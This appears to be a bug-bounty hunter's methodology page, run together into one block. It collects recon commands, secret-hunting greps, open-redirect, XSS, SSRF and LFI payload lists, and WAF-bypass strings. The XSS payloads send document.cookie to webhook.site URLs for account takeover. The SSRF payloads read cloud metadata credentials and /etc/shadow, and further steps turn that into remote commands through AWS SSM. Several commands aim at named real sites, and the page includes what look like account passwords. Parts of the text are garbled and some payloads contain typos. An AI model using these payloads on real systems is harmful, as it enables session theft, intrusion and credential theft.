🇵🇰XSS & Open Redirect
🔥 Perfect regex to Endpoints Analysis
(
figlet -f small -c "UUIDs" | lolcat; grep -Eo '[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[1-5][0-9a-fA-F]{3}-[89abAB][0-9a-fA-F]{3}-[0-9a-fA-F]{12}' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total UUIDs: "$1}');
figlet -f small -c "JWT" | lolcat; grep -a "eyJ" wayback.txt | grep -Eo 'eyJ[A-Za-z0-9_\-\.]+' | sort -u | tee >(wc -l | awk '{print "Total JWTs: "$1}');
figlet -f small -c "Suspicious Strings" | lolcat; grep -Eo '([a-zA-Z0-9_-]{20,})' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Suspicious: "$1}');
figlet -f small -c "Credit Cards" | lolcat; grep -Eo '\b[0-9]{13,16}\b' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total CCs: "$1}');
figlet -f small -c "SessionIDs" | lolcat; grep -Eo '[a-zA-Z0-9]{32,}' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total SessionIDs: "$1}');
figlet -f small -c "Tokens & Secrets" | lolcat; grep -aiE 'token=|token |code=|code |secret=|secret ' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Tokens/Secrets: "$1}');
figlet -f small -c "Credentials" | lolcat; grep -aiE 'admin|pass(word|wd|wd=)|pwd|passwd|password|mail|phone|mobile|number' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Cred-like: "$1}');
figlet -f small -c "Private IPs" | lolcat; grep -Eo '((10|172\.(1[6-9]|2[0-9]|3[0-1])|192\.168)\.[0-9]{1,3}\.[0-9]{1,3})' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Private IPs: "$1}');
figlet -f small -c "All IPs" | lolcat; grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' wayback_domain.com.txt | sort -u | tee >(wc -l | awk '{print "Total IPs: "$1}');
figlet -f small -c "Payments" | lolcat; grep -aiE 'payment|order(id)?|pay(id)?|invoice|receipt' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Payments: "$1}');
figlet -f small -c "Roles" | lolcat; grep -aiE 'role=|privilege=|=admin' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Roles: "$1}');
figlet -f small -c "API Endpoints" | lolcat; grep -aiE '/api/|api\.|/graphql|graphql' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total API Endpoints: "$1}');
figlet -f small -c "Auth Stuff" | lolcat; grep -aiE 'sso|/sso|saml|/saml|oauth|/oauth|auth|/auth|callback|/callback' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Auth: "$1}');
f
)Subdomains Gathering
domain=naturalis.nl; figlet -f small -c "Passive: Subfinder" | lolcat; subfinder -d $domain -all -recursive -t 200 -o subfinder.txt; figlet -f small -c "Passive: Assetfinder" | lolcat; assetfinder --subs-only $domain | tee assetfinder.txt; figlet -f small -c "Passive: Findomain" | lolcat; findomain --quiet -t $domain -u findomain.txt; figlet -f small -c "Passive: Web Archive" | lolcat; curl -s "https://web.archive.org/cdx/search/cdx?url=*.$domain&fl=original&collapse=urlkey" | awk -F/ '{print $3}' | sort -u | tee archive.txt; figlet -f small -c "Passive: crt.sh" | lolcat; curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt.txt ; figlet -f small -c "Active: Knockpy" | lolcat; knockpy -d $domain --recon --bruteforce | grep -oP 'https?://[a-zA-Z0-9.-]+(:[0-9]+)?' | tee knockpy.txt; figlet -f small -c "Sorting Subdomains" | lolcat; cat knockpy.txt crt.txt archive.txt assetfinder.txt subfinder.txt findomain.txt | sort -u | tee subdomains.txt; figlet -f small -c "Probing Live Subs" | lolcat; cat subdomains.txt | httpx-toolkit -ports 80,443,8080,8000,8888,8881,8889 -threads 200 | tee livesubdomains.txt; sed -i 's/:[0-9]\+//g' livesubdomains.txt; echo -e "\nLive Subdomains Count: $(cat livesubdomains.txt | wc -l)" | lolcatcurl -X GET http://50.116.35.69:86/index.js | grep -i -E "aws_access_key|aws_secret_key|api key|passwd|pwd|heroku|slack|firebase|swagger|aws_secret_key|aws key|password|ftp password|jdbc|db|sql|secret jet|config|admin|pwd|json|gcp|htaccess|.env|ssh key|.git|access key|secret token|oauth_token|oauth_token_secret|pass|passphrase|credentials|encryptKey|appKey|token|secret|Authorization|Key|private"site:.worldremit.com intext:"Swagger UI" | intitle:"Swagger UI"
?url=https://jumpy-floor.surge.sh/test.yaml
https://xss.smarpo.com/test.json
https://jumpy-floor.surge.sh/test.json
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/rlogin.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/ylogin.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/lw.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/rtest0.jsonwget -O data.txt "https://web.archive.org/cdx/search/cdx?url=*.udayton.edu/*&output=text&fl=original&collapse=urlkey&from=" cat data.txt | grep -E '\.xls|\.xlsx|\.json|\.sql|\.doc|\.docx|\.pptx|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.git|\.env|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc|\.conf|\..htaccess|\.htpasswd|\.pfx|\.p12|\.swp\.old|\.temp|\.dump|\.passwd|\.shadow|\.git|\.svn|\.DS_Store|\.idea|\.vscode|\.bash_history|\.zsh_history'cat data.txt | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazondirsearch -l subdomains_output/403_sub.txt --exclude-status=403 -w 403-ultimate-discovery.txtbash 403-bypass.sh -u https://target.com/secret --encode
bash 403-bypass.sh -u https://target.com/secret --header
bash 403-bypass.sh -u https://target.com/secret --protocol
bash 403-bypass.sh -u https://target.com/secret --HTTPmethoddirsearch -l subdomains_output/404_sub.txt --exclude-status=404 -w 404-ultimate-discovery.txtcurl -X GET http://50.116.35.69:86/index.js | grep -i -E 'password|pwd|pass|passphrase|credentials|encryptKey|appKey|token|secret|Authorization|Key|private'cat data.txt | grep "secure" | grep "jspa" && cat data.txt | grep '/geoserver/ows/' && cat data.txt | grep ganglia && cat data.txt | grep graph_all_periods.php && cat data.txt | grep "keycloak" && cat data.txt | grep "/realms/master" && cat data.txt | grep '?id='Open redirects in the login flow mostly have the session token or any other auth token in the query param.
site:.dv.ue.edu.pk inurl:login | intext:login | intitle:login | inurl:signin | inurl:admin | inurl:dashboard
site:.ue.edu.pk inurl:admin | inurl:dashboard | inurl:register | inurl:login | intitle:register | inurl:signup | intitle:signup | intext:signin | intext:login | intext:signup'"/><img src=x><a href=https://evil.com>Click
<b>hello</b><h1>hacker</h1><a href=https://evil.com>hacked
<img src="https://static.wikia.nocookie.net/mrbean/images/4/4b/Mr_beans_holiday_ver2.jpg">
<h1>Congratulations you won the cash prize </h1><img src="https://play-lh.googleusercontent.com/ufXzlOQA6bwOibqQ_yBmIFaqBWOl3bbgeffwPV8z3419PWPvHZfx4Vxe98GgQ8Z7mVQ"><a href="https://evil.com"><H1><U><I>Click here to claim your rewardin the name field: /"><img src=x onerror=alert(document.cookie)> in the name field.hunter2-ywh-f6a5371da6033e99@yeswehack.ninja
swag@bugcrowdninja.com
Python@123server-side redirects always use Location response header with 3XX status code If missing Location response header but still redirects (after a small delay), it DOM-based redirect
Run open-dork.sh Script
Check Server and client side redirect then Exploit Further
curl -I "https://opac.nust.edu.pk/cgi-bin/koha/tracklinks.pl?uri=https%3A%2F%2Fwww.elsevier.com%2Fbooks-and-journals%2Fbook-companion%2F9780128038437&biblionumber=591873"
curl -IL "http://www.paulsellers.nl/guestbook/go.php?url=https://docs.ultralytics.com/modes/predict/"
curl "https://account.cbg.nl/logout?redirect_uri=https://evil.com/" | grep -i -E 'location.href|window.location|window.location.href' javascript:alert(origin)
javascript:alert/**/(origin)
javascript:confirm(origin);//javascript:document.location=%27https://webhook.site/fd59355e-845b-4462-894a-c6809633adab/%27%2bdocument.cookieFind XSS Steps
Check
Subdomains.sh to tech based Filters DomainsCheck
Ext-dork to tech based Filters DomainsCheck
Shodan-dork to tech based Filters Domains
Run
ext-dork.shScriptwith Specific Domaindirsearch -w raft-medium-directories.txt -u https://xyz.example.com -e js,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl --full-url --max-rate=5 -i 200feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,php,phtml,inc,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl -w raft-small-directories.txt -u https://www.kfc.co.uk/ -t 10 --rate-limit 5ffuf -u https://www.kfc.co.uk/FUZZ -w common.txt -recursion -recursion-depth 4 -mc 200 -e .js,.php,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx,.cfm,.jsp,.jspx,.jsf,.jspa,.do,.action,.act,.pl -rate 50 -t 50
ffuf -w api-wordlist.txt -u https://target.com/API/v3/FUZZ -mc 200 -H "Content-Type: application/json" Check Hidden Paths inroborts.txt
httpx-toolkit -l livesubdomains.txt -paths /robots.txt -silent -o robots-url.txt && for url in $(cat robots-url.txt);do http -b $url | grep 'Disallow' | awk -F ' ' '{print $2}' | cut -c 2- | anew robot-words.txt;doneffuf -u FUZZ/robots.txt -w livesubdomains.txt -mr "/INTERSHOP/"Run
hostname:"mytoken.us.dell.com"Run
host:"mytoken.us.dell.com"nslookup mytoken.us.dell.com
Run
FuzzingwithFFUFRun
FuzzingwithGobusterRun
FuzzingwithDirsearch
Run
ArjunRun
ParamPamPamRun
x8with parameters wordlist
arjun -i endpoint.txt -oT Arjun.txt && cat Arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee xss-check.txt && cat xss-check.txt | Gxss | httpx -sc && cat xss-check.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee -a confirm-html-injection.txtcat xss-check.txt | Gxss -p '">asad<hacked' | tee -a confirm-xss.txtcat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -schttps://xss.report/dashboard
swagpk Synack@3434https://bxsshunter.com/dashboard
Synack@3434
'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>while read url; do
echo "Testing URL: $url"
yes n | ghauri -u "$url" --dbs --banner --current-db --level 3
done < arjun.txtghauri -u https://ugadmissions.neduet.edu.pk/admissions/user_login.jsp?id=1 --random-agent -v3 --level=3 risk=3cat xss-check.txt | qsreplace 'https://%09/evil.com' | httpx -status-code -title -locationcat xss-check.txt | sed 's/=.*/=/' | httpx-toolkit -paths op.txt -threads 50 -random-agent -sc -locationecho "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /home/kali/target/wordlists/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /home/kali/target/wordlists/lfi.txt -c -mr "root:" -v; done---------------------------------------------------------------------
1
Open Redirect GET-Based in Register-Login-logout-signup and Reset-Password Page URL
echo 'https://be.elementor.com/visit/?bta=13693&brand=elementor&landingPage=' | httpx -paths op.txt -threads 50 -random-agent -sc -location
https://evil.com
https://%09/evil.com
http%3A%2F%2Fwww.google.com
https%3A%2F%2Fwww.google.com%2F
https://www%2Egoogle%2Ecom
https://www%252Egoogle%252Ecom
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
%68%74%74%70%3a%2f%2fevil.com
/%0D/evil%25%32%65com
%40evil.com/
%2F%2Fevil.com
%2F%2F%2F%2Fhackerone.com//evil.com
///evil.com/
////evil.com
/%0d/evil.com
/%09/evil.com
/%0A/evil.com
/%0D/evil.com
/%09/evil.com
/+/evil.com
/\evil.com/
\\evil.com\
/..//evil.com
http:///evil.com/
@www.bing.com
.evil.com
https:evil.com
https;evil.com
https:\/\/evil.com
https:/\/\evil.com
https:\\evil.comtarget.com%40evil.com
https://target.com%5C%5C@google.com/
https://evil.com%5C%40www.example.com
https://target.com@evil.com/
https://target.com/@evil.com
https://evil.com\@target.com
https://target.com.bing.com/
https://target.com?bing.com
https://target.com°bing.com
https://target.com%23bing.com
https://target.com%00bing.com
https://target.com%0Abing.com
https://target.com%0Dbing.com
https://target.com%0Dbing.com
https://target.com%09bing.com
/%0d/evil.com/
https://evil.com\\.target.com/
https://evil.com%E3%80%82%23.target.com/
https://target.com%00https://evil.com/
https://website.com/http://evil.com/
http://evil.com?vimeocdn.com/
https://attacker.com%E3%80%82example.com
?link=https://bing.com?link=https://www.target.com/
?link=https://evil.com/?link=https://open.spreaker.com//https://evil.com
?Redirect=https:/www.target.com/login-redirect/?redirect=//any-domain.comhttps://auth.<company>/?next_url=https://www.<product>/login-redirect/?redirect=//any-domain.com?token=<TOKEN>
https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?next_action=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.82
DOM XSS Check In Redirect Parameters
javascript:confirm(1);//
java%0d%0ascript%0d%0a:alert(document.domain)
javascript://%250Dtop.confirm?.(origin)//
javascript:%250Aalert(1)//
javascript:@evil.com
java%0D%0Ascript%0D%0A:alert(document.domain)
javascript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)3
If Access token available In Redirect URL then Check Account take Over
j%09avascript:document.location=%27https://webhook.site/88322504-926e-477c-a16e-5c6ba6b24b7a/%27%2bdocument.cookieOR Check with Burp Collaborater And Webhook URL
4
SSRF Check In Redirect OR Data Fetch and File Download Parameters
wfuzz -z range,0-65535 -u 'https://www.somaiya.edu.in/download.php?pdf_path=127.0.0.1:FUZZ'python3 ssrfmap.py -r request.txt -p "url" -m readfiles,portscanhttp://[::]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254//latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/
file:///etc/passwd
file:///etc/shadow
file:///etc/shells
file:///etc/group
file:///etc/profile
file:///etc/hosts
file:///proc/self/environ
file:///proc/self/status
file:///proc/mounts
file:///proc/version
file:///bin/sh
file:///C:/Windows/win.ini
file:///web.config
file:///C:/windows/System32/drivers/etc/hosts
cat /e*c/p*s*d5
6
if SSRF then check to RCE
1) Configure AWS CLI
export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=us-west-1
export AWS_SESSION_TOKEN=
2) these Paths can be used to find the region
/latest/meta-data/placement/availability-zone
/latest/dynamic/instance-identity/document
3) aws sts get-caller-identity
4) aws s3 ls
5) aws ssm send-command --document-name "AWS-RunShellScript" --comment "AnyComment" --instance-ids="[Instance-id]" --parameters "commands=uname -a"7
Blind XSS Check to Account take Over
8
9
Find Hidden Endpoints FOR Fuzzing
recursion -recursion-depth 4
-rate 50 -t 50
-p 0.5-0.6
-v -mc 200
-v -fc 401,403
-e .html,.htm
-e .php,.html,.htm
-e .asp,.aspx,.html,.htm
-e .jsp,.jspx,.do,.html,.htm,.action
-x "http://127.0.0.1:8080"
-s--exclude-sizes 0B
--recursive
--random-agent
--max-rate=
--full-url
--cookie=
-i 200
-x 401,403
-e html,htm
-e php,html,htm,js
-e asp,aspx,html,htm,js
-e jsp,jspx,do,html,htm,action,js
-e js,php,html,xhtml,htm,asp,aspx,ashx,asmx,cfm,jsp,jspx,do,action,pl10
Find Hidden Parameters
python3 parampp.py -u https://press.zara.com/ECOMPressSite/error.htmlcat arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee xss.txt && cat xss.txt | Gxss | httpx -sc && cat xss.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee -a confirm-xss.txtcat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee xss.txt && cat xss.txt | Gxss | httpx -sc && cat xss.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee -a confirm-xss.txt-c 500
-d 2
-t 10 -T 10
--stable
--passive
-m POST
-oT arjun.txt
--disable-redirects
--headers ‘Cookie: PHPSESSID=xxxx’--reflected-only
-X GET
-u
-w
-v11
12
Confirm Vulnerable Parameter for Html injection OR Reflected XSS
"><a href=https://bing.com>hacked
'"><a href=https://bing.com>hacked<a href=https://bing.com>hacked
'"><marquee>Hacked_by_asad</marquee>
"><iframe width=500 height=500 src="https://evil.com"></iframe>
"-(alert)(origin)-"
'"><img src=x onerror=confirm(origin)>
"><svg onload=confirm(1)>
(confirm)(origin)
javascript:confirm(document.domain)
<"onmouseover=(confirm)(origin);"
"><a href=javascript:confirm(document.cookie)>ClickMe### if Website Remove payloads Kaywords then used this Payloads:
<a/href=javascript:alert(origin)>ClickMe
"><a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
"><input type=hidden oncontentvisibilityautostatechange=alert() style=content-visibility:auto>13
Akamai WAF Bypasses...
';k='e'%0Atop['al'+k+'rt'](1)//
'><A HRef=' AutoFocus OnFocus=top//?.['ale'%2B'rt'](1)>
---------------------
CloudFlare WAF Bypasses...
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ev'%2B'al'](`imp\u00%36%66rt\u00%32%38'//X55.is'\u00%32%39`)>
<svg/onload=window['al'+'ert']1337>
<Svg Only=1 OnLoad=confirm(document.cookie)>
<svg onload=alert(document.cookie)>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1//On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Img Src=OnXSS OnError=prompt(1337)>
<Img Src=OnXSS OnError=prompt(document.cookie)>
<Svg Only=1 OnLoad=confirm(atob('Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=='))>
---------------------
Cloudfront WAF Bypasses...
%2522%253E%253Csvg/onload=alert(origin)%253E
'>'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/aabb/['al'%2b'ert'](document./aabb/location);//
'>%0D%0A%0D%0A<x '='foo'><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>'>
---------------------
ModSecurity WAF Bypasses...
Payloads designed to evade ModSecurity WAF rules
<svg onload='new Function['Y000!'].find(al\u0065rt)'>
---------------------
Imperva WAF Bypasses...
Advanced techniques for bypassing Imperva WAF protection
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter='location=javas+cript:ale+rt%2+81%2+9;//</div'>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=alert(origin)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle='propmt(document.cookie);'>
---------------------
Sucuri WAF Bypasses...
<A HREF='https://www.cia.gov/'>Click Here </A>
'><img src=x onerror=alert(document.cookie)>
<button onClick='prompt(1337)'>Submit</button>
<a aa aaa aaaa aaaaaa href=javascript:alert(1337)>ClickMe
<a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
<a href='javascript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://github.com/coffinxp';'>ClickMe</a>14
Find Origin IP for Bypass WAF
hostname:".dell.com" http.component:php
hostname:".dell.com" http.component:java
hostname:".dell.com" http.component:ASP.NETnslookup mytoken.us.dell.com
https://search.censys.io/
host="mytoken.us.dell.com"
https://en.fofa.info/
domain="mytoken.us.dell.com"
https://www.shodan.io/search
hostname:"mytoken.us.dell.com"
curl -i url | head -n 1515
Create and Customize XSS Payload According WAF and Regex
16
RXSS to Account Take Over
'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>17
if GET Parameter Check for SQL injection
Last updated